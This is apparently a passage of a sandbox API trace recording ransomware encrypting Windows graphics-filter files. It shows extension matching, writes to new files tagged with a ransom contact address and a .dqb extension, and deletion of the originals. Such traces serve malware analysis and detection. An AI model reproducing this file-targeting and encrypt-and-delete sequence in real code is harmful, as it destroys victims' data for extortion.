lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0052.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.622] lstrlenW (lpString=".zip") returned 4 [0052.622] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0052.622] lstrlenW (lpString=".rar") returned 4 [0052.622] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0052.622] lstrlenW (lpString=".bz2") returned 4 [0052.622] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0052.622] lstrlenW (lpString=".7z") returned 3 [0052.622] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0052.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.622] lstrlenW (lpString=".dbf") returned 4 [0052.622] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0052.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.622] lstrlenW (lpString=".1cd") returned 4 [0052.622] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0052.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.622] lstrlenW (lpString=".jpg") returned 4 [0052.622] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0052.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.622] lstrlenW (lpString=".doc") returned 4 [0052.622] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0052.622] lstrlenW (lpString=".docx") returned 5 [0052.622] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0052.622] lstrlenW (lpString=".pdf") returned 4 [0052.622] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0052.623] lstrlenW (lpString=".xls") returned 4 [0052.623] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0052.623] lstrlenW (lpString=".xlsx") returned 5 [0052.623] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0052.623] lstrlenW (lpString=".ppt") returned 4 [0052.623] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0052.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.623] lstrlenW (lpString=".zip") returned 4 [0052.623] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0052.623] lstrlenW (lpString=".rar") returned 4 [0052.623] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0052.623] lstrlenW (lpString=".bz2") returned 4 [0052.623] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0052.623] lstrlenW (lpString=".7z") returned 3 [0052.623] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0052.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.623] lstrlenW (lpString=".dbf") returned 4 [0052.623] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0052.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.623] lstrlenW (lpString=".1cd") returned 4 [0052.623] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0052.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0052.623] lstrlenW (lpString=".jpg") returned 4 [0052.623] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0052.623] lstrcmpiW (lpString1=".FLT", lpString2=".dqb") returned 1 [0052.623] lstrlenW (lpString="CGMIMP32.FLT") returned 12 [0052.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.081] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=323936) returned 1 [0053.081] CloseHandle (hObject=0x218) returned 1 [0053.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 0x20 [0053.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.081] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.081] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0053.082] GetLastError () returned 0x0 [0053.082] ReadFile (in: hFile=0x218, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x4f160, lpOverlapped=0x0) returned 1 [0053.088] WriteFile (in: hFile=0x22c, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x4f170, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x4f170, lpOverlapped=0x0) returned 1 [0053.094] ReadFile (in: hFile=0x218, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.094] WriteFile (in: hFile=0x22c, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.094] SetEndOfFile (hFile=0x22c) returned 1 [0053.096] CloseHandle (hObject=0x22c) returned 1 [0053.097] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.097] SetEndOfFile (hFile=0x218) returned 1 [0053.100] CloseHandle (hObject=0x218) returned 1 [0053.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.100] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 1 [0053.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.100] lstrlenW (lpString=".doc") returned 4 [0053.100] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.100] lstrlenW (lpString=".docx") returned 5 [0053.100] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.100] lstrlenW (lpString=".pdf") returned 4 [0053.100] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.100] lstrlenW (lpString=".xls") returned 4 [0053.100] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.100] lstrlenW (lpString=".xlsx") returned 5 [0053.100] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.101] lstrlenW (lpString=".ppt") returned 4 [0053.101] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.101] lstrlenW (lpString=".zip") returned 4 [0053.101] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.101] lstrlenW (lpString=".rar") returned 4 [0053.101] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.101] lstrlenW (lpString=".bz2") returned 4 [0053.101] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.101] lstrlenW (lpString=".7z") returned 3 [0053.101] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.101] lstrlenW (lpString=".dbf") returned 4 [0053.101] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.101] lstrlenW (lpString=".1cd") returned 4 [0053.101] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.101] lstrlenW (lpString=".jpg") returned 4 [0053.101] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.101] lstrlenW (lpString=".doc") returned 4 [0053.101] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.101] lstrlenW (lpString=".docx") returned 5 [0053.101] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.101] lstrlenW (lpString=".pdf") returned 4 [0053.101] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.101] lstrlenW (lpString=".xls") returned 4 [0053.101] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.101] lstrlenW (lpString=".xlsx") returned 5 [0053.101] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.101] lstrlenW (lpString=".ppt") returned 4 [0053.101] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.102] lstrlenW (lpString=".zip") returned 4 [0053.102] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.102] lstrlenW (lpString=".rar") returned 4 [0053.102] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.102] lstrlenW (lpString=".bz2") returned 4 [0053.102] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.102] lstrlenW (lpString=".7z") returned 3 [0053.102] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.102] lstrlenW (lpString=".dbf") returned 4 [0053.102] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.102] lstrlenW (lpString=".1cd") returned 4 [0053.102] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0053.102] lstrlenW (lpString=".jpg") returned 4 [0053.102] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.102] lstrcmpiW (lpString1=".FLT", lpString2=".dqb") returned 1 [0053.102] lstrlenW (lpString="JPEGIM32.FLT") returned 12 [0053.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.250] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=241024) returned 1 [0053.250] CloseHandle (hObject=0x178) returned 1 [0053.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 0x20 [0053.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.250] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.251] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0053.251] GetLastError () returned 0x0 [0053.251] ReadFile (in: hFile=0x178, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x3ad80, lpOverlapped=0x0) returned 1 [0053.256] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x3ad90, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x3ad90, lpOverlapped=0x0) returned 1 [0053.260] ReadFile (in: hFile=0x178, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.260] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.260] SetEndOfFile (hFile=0x214) returned 1 [0053.260] CloseHandle (hObject=0x214) returned 1 [0053.260] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.260] SetEndOfFile (hFile=0x178) returned 1 [0053.262] CloseHandle (hObject=0x178) returned 1 [0053.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.262] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 1 [0053.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.263] lstrlenW (lpString=".doc") returned 4 [0053.263] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.263] lstrlenW (lpString=".docx") returned 5 [0053.263] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.263] lstrlenW (lpString=".pdf") returned 4 [0053.263] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.263] lstrlenW (lpString=".xls") returned 4 [0053.263] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.263] lstrlenW (lpString=".xlsx") returned 5 [0053.263] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.263] lstrlenW (lpString=".ppt") returned 4 [0053.263] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.263] lstrlenW (lpString=".zip") returned 4 [0053.263] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.263] lstrlenW (lpString=".rar") returned 4 [0053.263] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.263] lstrlenW (lpString=".bz2") returned 4 [0053.263] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.263] lstrlenW (lpString=".7z") returned 3 [0053.263] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.263] lstrlenW (lpString=".dbf") returned 4 [0053.263] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.263] lstrlenW (lpString=".1cd") returned 4 [0053.263] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.263] lstrlenW (lpString=".jpg") returned 4 [0053.263] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.263] lstrlenW (lpString=".doc") returned 4 [0053.264] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.264] lstrlenW (lpString=".docx") returned 5 [0053.264] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.264] lstrlenW (lpString=".pdf") returned 4 [0053.264] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.264] lstrlenW (lpString=".xls") returned 4 [0053.264] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.264] lstrlenW (lpString=".xlsx") returned 5 [0053.264] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.264] lstrlenW (lpString=".ppt") returned 4 [0053.264] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.264] lstrlenW (lpString=".zip") returned 4 [0053.264] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.264] lstrlenW (lpString=".rar") returned 4 [0053.264] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.264] lstrlenW (lpString=".bz2") returned 4 [0053.264] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.264] lstrlenW (lpString=".7z") returned 3 [0053.264] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.264] lstrlenW (lpString=".dbf") returned 4 [0053.264] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.264] lstrlenW (lpString=".1cd") returned 4 [0053.264] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0053.264] lstrlenW (lpString=".jpg") returned 4 [0053.264] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.264] lstrcmpiW (lpString1=".FLT", lpString2=".dqb") returned 1 [0053.265] lstrlenW (lpString="PNG32.FLT") returned 9 [0053.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.265] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=302976) returned 1 [0053.265] CloseHandle (hObject=0x178) returned 1 [0053.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 0x20 [0053.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.265] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.265] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0053.265] GetLastError () returned 0x0 [0053.266] ReadFile (in: hFile=0x178, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x49f80, lpOverlapped=0x0) returned 1 [0053.272] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x49f90, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x49f90, lpOverlapped=0x0) returned 1 [0053.280] ReadFile (in: hFile=0x178, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.280] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0053.280] SetEndOfFile (hFile=0x214) returned 1 [0053.281] CloseHandle (hObject=0x214) returned 1 [0053.281] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.281] SetEndOfFile (hFile=0x178) returned 1 [0053.284] CloseHandle (hObject=0x178) returned 1 [0053.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.284] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 1 [0053.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.284] lstrlenW (lpString=".doc") returned 4 [0053.284] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.284] lstrlenW (lpString=".docx") returned 5 [0053.284] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.284] lstrlenW (lpString=".pdf") returned 4 [0053.284] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.284] lstrlenW (lpString=".xls") returned 4 [0053.285] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.285] lstrlenW (lpString=".xlsx") returned 5 [0053.285] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.285] lstrlenW (lpString=".ppt") returned 4 [0053.285] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.285] lstrlenW (lpString=".zip") returned 4 [0053.285] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.285] lstrlenW (lpString=".rar") returned 4 [0053.285] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.285] lstrlenW (lpString=".bz2") returned 4 [0053.285] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.285] lstrlenW (lpString=".7z") returned 3 [0053.285] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.285] lstrlenW 